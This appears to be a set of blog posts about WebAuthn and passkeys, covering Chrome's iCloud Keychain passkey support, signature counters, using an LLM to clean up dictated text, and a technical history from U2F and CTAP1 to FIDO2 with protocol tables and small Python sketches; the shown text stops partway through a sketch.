A Tour of WebAuthn

I've done a bunch of posts about WebAuthn/passkeys over time. This year I decided to flesh them out a bit into a longer work on understanding and using WebAuthn. If you were at the FIDO conference in Carlsbad this year, you may have received a physical, printed booklet of the result. It took a while to get around to converting to HTML, but the text is now available online.

Let's Kerberos

(I think this is worth pondering, but I don’t mean it too seriously—don’t panic.)

Are the sizes of post-quantum signatures getting you down? Are you despairing of deploying a post-quantum Web PKI? Don’t fret! Symmetric cryptography is post-quantum too!

When you connect to a site, also fetch a record from DNS that contains a handful of “CA” records. Each contains:

“CA-key” is a symmetric key known only to the CA, and “server-CA-key” is a symmetric key known to the server and the CA.

The client finds three of these CA records where the UUID matches a CA that the client trusts. It then sends a message to each CA containing:

The CA can decrypt “client-CA-key” and then it can decrypt “server-CA-key” (from the DNS information that the client sent) using an AAD that’s either the client’s specified hostname, or else that hostname with the first label replaced with *, for wildcard records.

The CA replies with E_server-CA-key(client-server-key), i.e. the client’s chosen key, encrypted to the server. The client can then start a TLS connection with the server, send it the three encrypted client–server keys, and the client and server can authenticate a Kyber key-agreement using the three shared keys concatenated.

Both the client and server need symmetric keys established with each CA for this to work. To do this, they’ll need to establish a public-key authenticated connection to the CA. So these connections will need large post-quantum signatures, but that cost can be amortised over many connections between clients and servers. (And the servers will have to pass standard challenges in order to prove that they can legitimately speak for a given hostname.)

Some points:

Chrome support for passkeys in iCloud Keychain

Chrome 118 (which is rolling out to the Stable channel now) contains support for creating and accessing passkeys in iCloud Keychain.

Firstly, I’d like to thank Apple for creating an API for this that browsers can use: it’s a bunch of work, and they didn’t have to. Chrome has long had support for creating WebAuthn credentials on macOS that were protected by the macOS Keychain and stored in the local Chrome profile. If you’ve used WebAuthn in Chrome and it asked you for Touch ID (or your unlock password) then it was this. It has worked great for a long time.

But passkeys are supposed to be durable, and something that’s forever trapped in a local profile on disk is not durable. Also, if you’re a macOS + iOS user then it’s very convenient to have passkeys sync between your different devices, but Google Password Manager doesn’t cover passkeys on those platforms yet. (We’re working on it.)

So having iCloud Keychain support is hopefully useful for a number of people. With Chrome 118 you’ll see an “iCloud Keychain” option appear in Chrome’s WebAuthn UI if you’re running macOS 13.5 or later:

An image of the iCloud Keychain option in Chrome's WebAuthn UI

You won’t, at first, see iCloud Keychain credentials appear in autofill. That’s because you need to grant Chrome permission to access the metadata of iCloud Keychain passkeys before it can display them. So the first time you select iCloud Keychain as an option, you’ll see this:

An image of the macOS passkeys permission dialog

If you accept, then iCloud Keychain credentials will appear in autofill, and in Chrome’s account picker when you click a button to use passkeys. If you decline, then you won’t be asked again. You can still use iCloud Keychain, but you’ll have to go through some extra clicks every time.

You can change your mind in System Settings → Passkeys Access for Web Browsers, or you can run tccutil reset WebBrowserPublicKeyCredential from a terminal to reset that permission system wide. (Restart Chrome after doing either of those things.)

Saving a passkey in iCloud Keychain requires having an iCloud account and having iCloud Keychain sync enabled. If you’re missing either of those, the iCloud Keychain passkey UI will prompt you to enable them to continue. It’s not possible for a regular process on macOS to tell whether iCloud Keychain syncing is enabled, at least not without gross tricks that we’re not going to try. The closest that we can cleanly detect is whether iCloud Drive is enabled. If it is, Chrome will trigger iCloud Keychain for passkey creation by default when a site requests a “platform” credential in the hope that iCloud Keychain sync is also enabled. (Chrome will default to iCloud Keychain for passkey creations on accounts.google.com whatever the status of iCloud Drive, however—there are complexities to also being a password manager.)

If you opt into statistics collection in Chrome, thank you, and we’ll be watching those numbers to see how successful people are being in aggregate with this. If the numbers look reasonable, we may try making iCloud Keychain the default for more groups of users.

If you don’t want creation to default to iCloud Keychain, there’s a control in chrome://password-manager/settings:

An image of Chrome settings

I’ve described above how things are a little complex, but the setting is just a boolean. So, if you’ve never changed it, it reflects an approximation of what Chrome is doing. But if you set it, then every case will respect that. The enterprise policy CreatePasskeysInICloudKeychain controls the same setting if you need to control this fleet-wide.

With macOS 14, other password managers are able to provide passkeys into the system on macOS and iOS. This iCloud Keychain integration was written prior to Chromium building with the macOS 14 SDK so, if you happen to install such a password manager on macOS 14, its passkeys will be labeled as “iCloud Keychain” in Chrome until we can do another update. Sorry.

Signature counters

If you look at the structure of the signed messages in WebAuthn you’ll notice that one of the fields is called the “signature counter”. In the previous long post I said to ignore it, which is still correct, but here’s why.

Signature counters are optional for the authenticator to implement: it’s valid for a security key not to have a signature counter, although the vast majority of them do. A security key without one always reports a counter value of zero. But once a website has seen a non-zero value, the security key has to ensure that the counter, for all future assertions from a given credential, is strictly increasing.

The motivation of the signature counter is that it might allow websites to detect when a security key has been cloned. Cloning a security key is supposed to be very difficult. At the very least, you should need physical access to it, and hopefully you need to spend a substantial amount of time invasively interrogating it. But, if you assume all that happened, then one could clone a security key (probably destroying it in the process), get the private key of a credential out of it, and create a working replica which could be slipped back into the possession of the legitimate user, leaving them unaware that anything has happened. At this point, the attacker can create assertions at will because they know the credential’s private key.

If all that has happened, then the signature counter might uncover it. Unless the attacker can know exactly when the legitimate user has created an assertion, and thus incremented the counter, then eventually either they or the real user will create an assertion where the counter didn’t increase.

You might be able to tell, but I consider this a rather far-fetched scenario. Nevertheless, if a website wants to use the signature counters, then it must treat any non-incrementing counter as a signal to lock the account and trigger an investigation. At a minimum, the security key in question should be replaced. Simply rejecting the assertion is meaningless: the attacker will just increment the counter and try again, and a regular user will assume that it’s some temporary glitch and do the same.
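For a site that does decide to check counters, the policy above could be sketched roughly as follows. The function and enum names are hypothetical, and the sketch assumes the site stores the last counter value seen for each credential.

```python
from enum import Enum


class CounterResult(Enum):
    OK = "ok"
    NO_COUNTER = "no counter"          # authenticator only ever reports zero
    POSSIBLE_CLONE = "possible clone"  # lock the account and investigate


def check_signature_counter(stored: int, received: int) -> CounterResult:
    """Compare the counter in a new assertion with the last stored value."""
    if stored == 0 and received == 0:
        # This credential has never shown a non-zero counter, so there is
        # nothing to compare against.
        return CounterResult.NO_COUNTER
    if received > stored:
        return CounterResult.OK
    # Equal or lower than the stored value. Simply rejecting the assertion
    # is meaningless, so the caller is told to treat this as a clone signal.
    return CounterResult.POSSIBLE_CLONE
```

The point of returning a distinct result, rather than a boolean, is that the caller cannot easily mistake a counter failure for a transient error.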

However, where I’ve seen sites bothering to check the signature counter, they’ve always just treated it as a transient error. And I’ve never heard of a signature counter actually being used to catch an attack.

On the other hand, many security keys only have a single, global signature counter, and this allows different websites to correlate the use of the same security key between them. That is, the current counter value of your security key is somewhat identifying and can be combined with information about how often you use it. For that reason, some security keys implement more granular signature counters, and good for them, but I consider it rather a waste.

When passkeys are synced between machines, they never implement signature counters because that would require that the set of machines maintain a coherent value. So, over time, you’ll probably observe that the majority of credentials don’t have them.

Voice recognition

Update: Evan let me know that Whisper solved the voice recognition problem. He has a wrapper that records from a microphone and prints the transcription here. Whisper is very impressive and the only caveat is that it sometimes inserts whole fabricated sentences at the end. The words always sort of make sense in context, but there were no sounds that could possibly have caused it. It's always at the very end in my experience, and it's no problem to remove it so, with that noted, you should ignore everything below because Whisper is a better answer.

Last week’s blog post was rather long, and had a greater than normal number of typos. (Thanks to people who pointed them out. I think I’ve fixed all the ones that were reported.)

This was because I saw in reviews that iOS 17’s voice recognition was supposed to be much improved, and I figured that I’d give it a try. I’ve always found iOS’s recognition to be superior to Google Docs and I have an old iPad Pro that’s good for betas.

iOS’s performance remains good and, yes, I think it’s better than iOS 16. But it’s still hardly at the level of “magic”, especially when using technical terms. Here’s a paragraph taken directly from the raw output of last week’s post (I’ve highlighted errors with italics):

It is integrated into the W3C credential management specification and so it is called via navigator . credentials . create and navigator .credentials. get. This document is about understanding the deeper structures that underpin web orphan rather than being a guy as to its details. So we will leave a great many details to the numerous guides to Web Oran that already exist on the web and instead focus on how structures from UF were carried over into Web orphan and updated.

While it’s nice that many of the words are there, with that density of errors, doing all the corrections means that it’s not clearly better than typing things out. However, the world is all aflutter about LLMs these days. Can they help?

I wrote a script to chunk paragraphs of text so that the chunks were at least 500 bytes, and then to send them to gpt-3.5-turbo with the following instructions prefixed, and a temperature of 0.6:

The following is the output of a poor speech recognition system. Please correct its errors and reply with the corrected version without any preamble. Some of the uncommon words that the system can’t recognise are U2F, CTAP, FIDO, CTAP2, JSON, FIDO2, WebAuthn, bearer token, hash, phishing, RP ID, passkey, caBLE, and password manager.

Here’s the cleaned up version of that paragraph.

It is integrated into the W3C credential management specification and so it is called via navigator.credentials.create and navigator.credentials.get. This document is about understanding the deeper structures that underpin web authentication rather than being a guide as to its details. So we will leave a great many details to the numerous guides to WebAuthn that already exist on the web and instead focus on how structures from U2F were carried over into WebAuthn and updated.

There’s one case where it wrote “web authentication” rather than “WebAuthn”, but it fixed all the other problems!
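The chunking step of that script might look something like the sketch below. It is not the original script: the function names are made up for illustration, paragraphs are assumed to be separated by blank lines, and the call to the model itself is left out.

```python
def chunk_paragraphs(text: str, min_bytes: int = 500) -> list[str]:
    """Group blank-line-separated paragraphs into chunks of at least min_bytes."""
    chunks: list[str] = []
    current: list[str] = []
    size = 0
    for para in text.split("\n\n"):
        para = para.strip()
        if not para:
            continue
        current.append(para)
        size += len(para.encode("utf-8"))
        if size >= min_bytes:
            chunks.append("\n\n".join(current))
            current, size = [], 0
    if current:
        # Whatever is left over forms a final chunk, which may be short.
        chunks.append("\n\n".join(current))
    return chunks


def build_prompt(instructions: str, chunk: str) -> str:
    """Prefix the instructions to a chunk, ready to send to a model."""
    return instructions + "\n\n" + chunk
```

Splitting only at paragraph boundaries means that no sentence is ever cut in half, at the cost of chunks that vary in size.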

So that’s what I tried: I dictated long chunks to iOS, then ran a script to clean it up with GPT, then edited it manually in Obsidian. From Obsidian, pandoc converted to HTML and EPUB formats.

That prompt is the result of some experimentation. Initially, I asked GPT to fix “errors and grammar” but, when reading the results, some sentences were incorrect and I found that it had “fixed” them into nonsense. Therefore I dropped “and grammar”. You can ask it to output in Markdown format, and I probably should have done that, but I was too far into manual editing by the time that I thought of it.

An oddity was that I wrote the instructions with the word “recognise” (English spelling) but then thought that it might work better with the more common American spelling (“recognize”). But that seemed to make it worse!

An obvious thing to try was to use GPT 4. However, I misread the costs of OpenAI’s API and thought that their charges were per-token, not per 1000 tokens. So with estimates that were off by three orders of magnitude, GPT 4 seemed a bit too expensive for a random experiment and I used GPT 3.5 for everything.

I didn’t write this post the same way, but this experiment worked well enough that I might try it again in the future for longer public writing.

From U2F to passkeys

(This post is nearing 8 000 words. If you want to throw it onto an ereader there's an EPUB version too.)

Introduction

Over more than a decade, a handful of standards have developed into passkeys, a plausible replacement for passwords. They picked up a lot of complexity on the way, and this post tries to give a chronological account of the development of the core of these technologies. Nothing here is secret; it’s all described in various published standards. However, it can be challenging to read these standards and understand how they’re meant to fit together.

The beginning: U2F

U2F stands for “Universal Second Factor”. It was a pair of standards, one for computers to talk to small removable devices called security keys, and the second a JavaScript API for websites to use them. The first standard of the pair is also called the Client to Authenticator Protocol (CTAP1), and when the term “U2F” is used in isolation, it usually refers to that. The JavaScript API, now obsolete, was generally referred to as the “U2F API”.

The goal of U2F was to eliminate “bearer tokens” in user authentication. A “bearer token” is a term of art in authentication that refers to any secret that is passed around to prove identity. A password is the most common example of such a secret. It’s a bearer token because you prove who you are by disclosing it, on the assumption that nobody else knows the secret. Passwords are not the only bearer tokens involved in computer security by a long way—the infamous cookies that all web users are constantly bothered about are another example. But U2F was focused on user authentication, while cookies identify computers, so U2F was primarily trying to augment passwords.

The problem with bearer tokens is that to use them, you have to disclose them. And knowledge of the token is how you prove your identity. So every time you prove your identity, you are handing another entity the power to impersonate you. Hopefully, the other entity is the intended counterparty and so would gain nothing from impersonating you to itself. But websites are very complicated counterparties, made up of many different parts, any one of which could be compromised to leak these tokens.

Digital signatures are preferable to bearer tokens because it’s possible to prove possession of a private key, using a signature, without disclosing that private key. So U2F allowed signatures to be used for authentication on the web.

While U2F is generally obsolete these days, it defined the core concepts that shaped how everything that came after it worked. (And there remain plenty of U2F security keys in use.) It’s also the clearest demonstration of those concepts, before things got more complex, so we’ll cover it in some detail. The following sections use modern terminology where things have been renamed, so you’ll see different names if you look at the U2F specs.

Creating a credential

CTAP1 only includes two different commands: one to create a credential and one to get a signature from a credential. Websites make requests using the U2F JavaScript API and the browser translates them into CTAP1 commands.

Here’s the structure of the CTAP1 request for creating a credential:

Offset  Size  Meaning
0       1     Command code, 0x01 to register
1       2     Flags, always zero
3       2     Length of following data, always 64
5       32    SHA-256 hash of client data
37      32    SHA-256 hash of AppID

There are two important inputs here: the two hashes. The first is the hash of the “client data”, a JSON structure built by the browser. The security key includes this hash in its signed output and it’s what allows the browser (or operating system) to put data into the signed message. The JSON is provided to the website by the browser and can include a variety of things, but there are two that are worth highlighting:

Firstly, the origin that made the JavaScript call. (An origin is the protocol, hostname, and port number of a URL.) This allows the website’s server to know what origin the user was interacting with when they were using their security key, and that allows it to stop phishing attacks by rejecting unknown origins. For example, if all sign-in and account actions are done on https://accounts.example.com, then the server needs to permit that as a valid origin. But, by rejecting all other origins, phishing attacks are easily defeated.

When used outside of a web context, for example by an Android app, the “origin” will be a special URL scheme that includes the hash of the public key that signed the app. If a backend server expects users to be signing in with an app, then it must recognize that app as a valid origin value too. (You might see in some documentation that there’s an iOS scheme similarly defined but, in fact, iOS incorrectly puts a web origin into the JSON string even when the request comes from an app.)

The second value from the client data worth highlighting is called the “challenge”. This value is provided by the website and it’s a large random number. Large enough that the website that created it can be sure that any value derived from it must have been created afterwards. This ensures that any reply derived from it is “fresh” and this prevents replay attacks, where an old response is repeated and presented as being new.

There are other values in the JSON string too (e.g. the type of the message, to provide domain separation), but they’re peripheral to this discussion.
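As a rough illustration of the server-side checks on the client data, here is a minimal sketch. It assumes the WebAuthn-style member names ("type", "challenge" and "origin", with the challenge base64url-encoded); the original U2F JSON used slightly different names. The function names are hypothetical.

```python
import base64
import hmac
import json


def b64url_decode(s: str) -> bytes:
    """Decode base64url text that may have had its padding stripped."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def check_client_data(client_data_json: bytes, expected_challenge: bytes,
                      allowed_origins: set[str], expected_type: str) -> bool:
    """Return True if the client data matches what the server expected."""
    data = json.loads(client_data_json)
    if data.get("type") != expected_type:
        return False  # domain separation: wrong kind of message
    if data.get("origin") not in allowed_origins:
        return False  # unknown origin, possibly a phishing site
    challenge = b64url_decode(data.get("challenge", ""))
    # The challenge must be the one issued for this session, which is what
    # makes the response fresh.
    return hmac.compare_digest(challenge, expected_challenge)
```

In WebAuthn the expected type would be "webauthn.create" when registering and "webauthn.get" when signing in. The server also needs to check that the hash of this JSON is what the security key actually signed, which is not shown here.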

Now we’ll discuss the second hash in the request: the AppID hash. The AppID is specified by the website and its hash is forever associated with the newly created credential. The same value must be presented every time the credential is used.

A privacy goal of U2F and the protocols that followed it was to prevent the creation of credentials that span websites, and thus could be a form of “super cookie”. So the AppID hash identifies the site that created a credential and, if some other site tries to use it, it prevents them from doing so. Clearly, to be effective, the browser has to limit what AppIDs a website is allowed to use—otherwise all websites could just decide to use the same AppID and share credentials!

U2F envisioned a process where browsers could fetch the AppID (which is a URL) and parse a JSON document from it that would list other sorts of entities, like apps, that would be allowed to use an AppID. But in practice, I don’t believe any of the browsers ever implemented that. Instead, a website was allowed to use an AppID if the host part of the AppID could be formed by removing labels from the website’s origin without hitting an eTLD. That was a complicated sentence, but don’t worry about it for now. AppIDs are defunct, and we will cover this logic in more detail when we discuss their replacement in a later section.

What you should take away is that credentials have access controls, so that websites can only use their own credentials. This happens to stop most phishing attacks, but that’s incidental: the hash of the JSON from the browser is what is supposed to stop phishing attacks. Rather, the AppID should be seen as a constraint on websites.

Given those inputs, the security key generates a new credential, consisting of an ID and public–private key pair.
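To make the request layout concrete, here is a small sketch that builds those 69 bytes following the table in this section. Big-endian byte order for the two-byte fields is an assumption (the table doesn't say), and the function name is made up for illustration.

```python
import hashlib
import struct

CMD_REGISTER = 0x01


def build_register_request(client_data_json: bytes, app_id: str) -> bytes:
    """Build a CTAP1 registration request from the client data and AppID."""
    client_data_hash = hashlib.sha256(client_data_json).digest()
    app_id_hash = hashlib.sha256(app_id.encode("utf-8")).digest()
    # Command code, two flag bytes (always zero), then the length of the
    # data that follows: two 32-byte hashes.
    header = struct.pack(">BHH", CMD_REGISTER, 0, 64)
    return header + client_data_hash + app_id_hash
```

Note that the security key never sees the JSON or the AppID themselves, only their hashes.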

Registration errors

Assuming that the request is well-formed, there is only one plausible error that the security key can return, but it happens a lot! The error is called “test of user presence required”. It means that a human needs to touch a sensor on the security key. U2F was designed so that security keys could be implemented in a Java-based framework that did not allow requests to block, so the computer is expected to repeatedly send requests and, if they result in this error, to wait a short amount of time and to send them again. Security keys will generally blink an LED while the stream of requests is ongoing, and that’s a signal to the user to physically touch the security key. If a touch was registered within a short time before the request was received, then the request will be processed successfully.

This shows “user presence”, i.e. that some human actually authorised the operation. Security keys don’t (generally) have a trusted display that says what operation is being performed, but this check does stop malware from getting the security key to perform operations silently.
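The polling behaviour described above might be sketched like this. The `send` callable is a hypothetical stand-in for whatever transport talks to the security key, and the status values (0x9000 for success, 0x6985 for "test of user presence required") are taken from the U2F raw message format rather than from the text here. The interval and attempt limit are arbitrary.

```python
import time
from typing import Callable

SW_NO_ERROR = 0x9000
SW_CONDITIONS_NOT_SATISFIED = 0x6985  # "test of user presence required"


def poll_until_touched(send: Callable[[bytes], tuple[int, bytes]],
                       request: bytes, interval: float = 0.2,
                       max_attempts: int = 150) -> bytes:
    """Resend a request until the security key reports that it was touched."""
    for _ in range(max_attempts):
        status, response = send(request)
        if status == SW_NO_ERROR:
            return response
        if status != SW_CONDITIONS_NOT_SATISFIED:
            raise RuntimeError(f"security key error 0x{status:04x}")
        # No touch yet: wait a short time and send the same request again.
        time.sleep(interval)
    raise TimeoutError("no touch registered")
```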

The registration response

Here’s what comes back from a U2F security key after creating a credential:

Offset    Size      Meaning
0         1         Reserved, always has value 0x05
1         65        Public key (uncompressed X9.62)
66        1         Length of credential ID (“L”)
67        variable  Credential ID
67 + L    variable  X.509 attestation certificate
variable  variable  ECDSA signature

The public key field is hopefully pretty obvious: it’s the public key of the newly created credential. U2F always uses ECDSA with P-256 and SHA-256, and a P-256 point in uncompressed X9.62 format is 65 bytes long.

Next, the credential ID is an opaque identifier for the credential (although we will have more to say about it later).

Then comes the attestation certificate. Every U2F security key has an X.509 certificate that (usually) identifies the make and model of the security key. The private key corresponding to the certificate is embedded within the security key and, hopefully, is hard to extract. Every new credential is signed by this attestation certificate to attest that it was created within a specific make and model of security key.

But a unique attestation certificate would obviously become a tracking vector that identifies a given security key every time it creates a credential! Since we don’t want that, the same attestation certificate is used in many security keys and manufacturers are supposed to use the same certificate for batches of at least 100,000 security keys.

Finally, the response contains the signature, from that attestation certificate, over several fields of the request and response.
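Splitting that response into its fields is slightly fiddly because the certificate has no explicit length: you have to read the DER header to find where it ends. A minimal sketch, with hypothetical names and no validation of the certificate or signature:

```python
from dataclasses import dataclass


@dataclass
class RegistrationResponse:
    public_key: bytes
    credential_id: bytes
    attestation_cert: bytes
    signature: bytes


def der_total_length(data: bytes) -> int:
    """Return the length, header included, of the DER element at the start."""
    if len(data) < 2:
        raise ValueError("truncated DER element")
    first = data[1]
    if first < 0x80:
        return 2 + first  # short form: the byte is the body length
    num = first & 0x7F    # long form: number of length bytes that follow
    if num == 0 or len(data) < 2 + num:
        raise ValueError("unsupported or truncated DER length")
    return 2 + num + int.from_bytes(data[2:2 + num], "big")


def parse_registration_response(resp: bytes) -> RegistrationResponse:
    if len(resp) < 67 or resp[0] != 0x05:
        raise ValueError("not a U2F registration response")
    public_key = resp[1:66]
    id_len = resp[66]
    cred_end = 67 + id_len
    if len(resp) < cred_end:
        raise ValueError("truncated credential ID")
    rest = resp[cred_end:]
    cert_len = der_total_length(rest)
    if cert_len > len(rest):
        raise ValueError("truncated certificate")
    # Everything after the certificate is the ECDSA signature.
    return RegistrationResponse(public_key, resp[67:cred_end],
                                rest[:cert_len], rest[cert_len:])
```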

Note that there’s no self-signature from the credential. That was probably a mistake in the design, but it’s a mistake that is still with us today. In fact, if you don’t check the attestation signature then nothing is signed and you needn’t have bothered with the challenge parameter at all! That’s why you might see a challenge during registration being set to a single zero byte or other such placeholder value.

Statelessness

The vast majority of (probably all?) U2F security keys don’t actually store anything when they create a credential. The credential ID that they return is actually an encrypted seed that allows the security key to regenerate the private key as needed. So the security key has a single root key that it uses to encrypt generated seeds, and those encrypted seeds are the credential IDs. Since you always need to send the credential ID to a U2F security key when getting a signature from it, no per-credential storage is necessary.

The credential ID (called a “key handle” in the U2F specs) won’t just be an encryption of the seed because you want the security key to be able to ignore credential IDs that it didn’t generate. Also, the AppID hash needs to be mixed into the ciphertext somehow so that the security key can check it. But any authenticated encryption scheme can manage these needs.

Whenever you reset a stateless security key, it just regenerates its root key, thus invalidating all previous credentials.
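Here is a toy model of a stateless security key. To stay within Python’s standard library it swaps the technique: instead of encrypting a seed with an authenticated encryption scheme, it puts a random nonce in the credential ID and derives both the seed and an authentication tag from the root key with HMAC. That has the same properties discussed above, but it is a substitution for illustration and not how any particular product works. All names are hypothetical.

```python
import hashlib
import hmac
import os
from typing import Optional


class StatelessKey:
    def __init__(self) -> None:
        self.root_key = os.urandom(32)

    def reset(self) -> None:
        # A new root key invalidates every credential ID issued so far.
        self.root_key = os.urandom(32)

    def _mac(self, label: bytes, nonce: bytes, app_id_hash: bytes) -> bytes:
        return hmac.new(self.root_key, label + nonce + app_id_hash,
                        hashlib.sha256).digest()

    def create(self, app_id_hash: bytes) -> tuple[bytes, bytes]:
        """Return (credential_id, seed) without storing anything."""
        nonce = os.urandom(32)
        credential_id = nonce + self._mac(b"tag", nonce, app_id_hash)
        return credential_id, self._mac(b"seed", nonce, app_id_hash)

    def recover(self, credential_id: bytes,
                app_id_hash: bytes) -> Optional[bytes]:
        """Regenerate the seed, or return None for an unrecognised ID."""
        if len(credential_id) != 64:
            return None
        nonce, tag = credential_id[:32], credential_id[32:]
        # The tag only verifies with this key's root key and the same AppID
        # hash that was used at creation.
        if not hmac.compare_digest(tag, self._mac(b"tag", nonce, app_id_hash)):
            return None
        return self._mac(b"seed", nonce, app_id_hash)
```

A real security key would turn the seed into a P-256 private key; that step is omitted.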

Getting assertions

An “assertion” is a signature from a credential. Like we did when we covered credential creation, let’s look at the structure of a CTAP1 assertion request because it still carries the core concepts that we see in passkeys today:

Offset  Size      Meaning
0       1         Command code, 0x02 to get an assertion
1       2         Flags: 0x0700 for “check-only”, 0x0300 otherwise
3       2         Length of following data
5       32        SHA-256 hash of Client Data
37      32        SHA-256 hash of AppID
69      1         Length of credential ID (“L”)
70      variable  Credential ID

We already know what the client data and AppID hashes are. (Although this time you definitely need a random challenge in the client data!)

The security key will attempt to decrypt the credential ID and authenticate the AppID hash. If unsuccessful, perhaps because the credential ID is from a different security key, it will return an error. Otherwise, it will check to see whether its touch sensor has been touched recently and, if so, it will return the requested assertion. (If the touch sensor hasn’t been triggered then the platform does the same polling as when creating a credential, as detailed above.)
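As with registration, the request layout can be sketched in a few lines. This follows the table in this section; big-endian byte order for the two-byte fields is an assumption, and the names are made up for illustration.

```python
import struct

CMD_GET_ASSERTION = 0x02
FLAGS_CHECK_ONLY = 0x0700
FLAGS_SIGN = 0x0300


def build_assertion_request(client_data_hash: bytes, app_id_hash: bytes,
                            credential_id: bytes,
                            check_only: bool = False) -> bytes:
    """Build a CTAP1 assertion request for a single credential ID."""
    if len(client_data_hash) != 32 or len(app_id_hash) != 32:
        raise ValueError("hashes must be 32 bytes")
    if len(credential_id) > 255:
        raise ValueError("credential ID length must fit in one byte")
    body = (client_data_hash + app_id_hash +
            bytes([len(credential_id)]) + credential_id)
    flags = FLAGS_CHECK_ONLY if check_only else FLAGS_SIGN
    return struct.pack(">BHH", CMD_GET_ASSERTION, flags, len(body)) + body
```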

The bytes signed by an assertion look like this:

Offset  Size  Meaning
0       32    SHA-256 hash of the AppID
32      1     0x1 if user-presence was confirmed, zero otherwise
33      4     Signature counter
37      32    SHA-256 hash of the Client Data
The signature covers the client data hash, and thus it covers the challenge from the website. So the website can be convinced that it is a fresh signature from the security key. Since the client data also includes the origin, the website can check that the user hasn’t been phished.

There’s also a “signature counter” field. All you need to know is that you should ignore it—the field will generally be zero these days anyway.
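A website verifying an assertion has to rebuild those signed bytes itself, from the AppID it expects and the client data it received. A minimal sketch of that reconstruction follows; the big-endian counter matches the U2F raw message format, the function name is hypothetical, and the ECDSA verification itself is left out because it needs a library outside Python’s standard library.

```python
import struct


def assertion_signed_bytes(app_id_hash: bytes, user_present: bool,
                           counter: int, client_data_hash: bytes) -> bytes:
    """Rebuild the 69 bytes covered by an assertion signature."""
    if len(app_id_hash) != 32 or len(client_data_hash) != 32:
        raise ValueError("hashes must be 32 bytes")
    # One user-presence byte followed by the four-byte signature counter.
    middle = struct.pack(">BI", 1 if user_present else 0, counter)
    return app_id_hash + middle + client_data_hash
```

Because the website computes both hashes itself, a signature that verifies over these bytes ties the assertion to the expected AppID and to the exact client data, challenge and origin included.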

Transports

Most security keys are USB devices. They appear on the USB bus as a Human Interface Device (HID) and they have a special usage-page number to identify themselves.

NFC-capable security keys are also quite common and frequently offer a USB connection too. When using the security key via NFC, the touch sensor isn’t used. Merely having the security key in the NFC field is considered to satisfy user presence.

There are also Bluetooth security keys. They work over the GATT protocol and their major downside is that they need a battery. For a long time, Bluetooth security keys were the only way to get a security key to work with iOS, but since iOS added native support, they’ve become much less common. (And Yubico now makes a security key with a Lightning connector.)

Connecting U2F to the web

FIDO defined a web API for U2F. I’m not going to go into the details because it’s obsolete now (and Chromium never actually implemented it, instead shipping an internal extension that sites could communicate with via postMessage), but it’s important to understand how browsers translated requests from websites into U2F commands because it’s still the core of how things work now.

When registering a security key, a website could provide a list of already registered credential IDs. The idea was that the user should not mistakenly register the same security key twice, so any security key that recognised one of the already known credential IDs should not be used to complete the registration request.

Browsers implement this by sending a series of assertion requests to each security key to see whether any of the credential IDs are valid for them. That’s why there’s a “check only” mode in the assertion request: it causes the security key to report whether the credential ID was recognised without requiring a touch.

When Chrome first implemented U2F support, any security keys excluded by this check were ignored. But this meant that they never flashed and users found that confusing—they assumed that the security key was broken. So Chrome started sending dummy registration requests to those security keys, which made them flash. If the user touched them, the created credential would be discarded. (That was presumably a strong incentive for U2F security keys to be stateless!)

When signing in, a site sends a list of known credential IDs for the current user. The browser sends a series of “check only” requests to the security keys until it finds a credential recognised by each key. Then it repeatedly sends a normal request for that credential ID until the user touches a security key. The security key that the user touches first “wins” and that assertion is returned to the website.
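The two phases of that sign-in flow can be modelled with a toy security key. Everything here is hypothetical scaffolding (the class, the method names, the way a touch is simulated); it only aims to show the order of operations, not how any browser is implemented.

```python
from typing import Optional


class FakeSecurityKey:
    """Hypothetical stand-in for a security key attached to the computer."""

    def __init__(self, name: str, known_ids: set[bytes],
                 touched: bool = False) -> None:
        self.name = name
        self.known_ids = known_ids
        self.touched = touched

    def check_only(self, credential_id: bytes) -> bool:
        # Reports whether the credential ID is recognised; needs no touch.
        return credential_id in self.known_ids

    def sign(self, credential_id: bytes) -> Optional[bytes]:
        # None models the "test of user presence required" error.
        if not self.touched:
            return None
        return b"assertion from " + self.name.encode()


def find_candidates(keys: list[FakeSecurityKey], allowed_ids: list[bytes]):
    """Phase one: check-only requests to find a usable ID for each key."""
    candidates = []
    for key in keys:
        for cid in allowed_ids:
            if key.check_only(cid):
                candidates.append((key, cid))
                break
    return candidates


def sign_in(keys: list[FakeSecurityKey], allowed_ids: list[bytes],
            max_rounds: int = 100) -> Optional[bytes]:
    """Phase two: poll the candidates until one of them has been touched."""
    candidates = find_candidates(keys, allowed_ids)
    for _ in range(max_rounds):
        for key, cid in candidates:
            assertion = key.sign(cid)
            if assertion is not None:
                return assertion  # the first key touched wins
    return None
```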

The need for the website to send a list of credential IDs determines the standard U2F sign-in experience: the user enters their username and password and, if recognised, then the site asks them to tap their security key. A desire to move away from this model motivated the development of the next iteration of the standards.

FIDO2

The U2F ecosystem described above satisfied the needs of second-factor authentication. But that doesn’t get rid of passwords: you still have to enter your password first and then use your security key. If passwords were to be eliminated, more was needed. So an effort to develop a new security key protocol, CTAP2, was started.

Concurrent with the development of CTAP2, an updated web API was also started. That ended up moving to the W3C (the usual venue for web standards) and became the “Web Authentication” spec, or WebAuthn for short.

Together, CTAP2 and WebAuthn constituted the FIDO2 effort.

Discoverable credentials

U2F credentials are called “non-discoverable”. This means that, in order to use them, you have to know their credential ID. “Discoverable” credentials are ones that a security key can find by itself, and thus they can also replace usernames.

A security key with discoverable credentials must dedicate storage for each of them. Because of this, you sometimes see discoverable credentials called “resident credentials”, but there is a distinction between whether the security key keeps state for a credential vs whether it’s discoverable. A U2F security key doesn’t have to be stateless, it could keep state for every credential, and its credential IDs could simply be identifiers. But those credentials are still non-discoverable if they can only be used when their credential ID is presented.

With discoverable credentials comes the need for credential metadata: if the user is going to select their account entirely client-side, then the client needs to know something like a username. So in the FIDO2 model, each credential gets three new pieces of metadata: a username, a user display name, and a user ID. The username is a human-readable string that uniquely identifies an account on a website (it often has the form of an email address). The user display name can be a more friendly name and might not be unique (it often has the form of a legal name). The user ID is an opaque binary identifier for an account.

The user ID is different from the other two pieces of metadata. Firstly, it is returned to the website when signing in, while the other metadata is purely client-side once it has been set. Also, the user ID is semantically important because a given security key will only store a single discoverable credential per website for a given user ID. Attempting to create a second discoverable credential for a website with a user ID that matches an existing one will cause the existing one to be overwritten.
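One way to picture the overwrite rule is as a table keyed by the website and the user ID. The sketch below is a toy model with hypothetical names, not a description of how any security key stores things.

```python
class DiscoverableStore:
    """Toy model of a security key's discoverable credential storage."""

    def __init__(self) -> None:
        # At most one credential per (website, user ID) pair.
        self._creds: dict[tuple[str, bytes], dict] = {}

    def create(self, site: str, user_id: bytes, username: str,
               display_name: str, credential_id: bytes) -> None:
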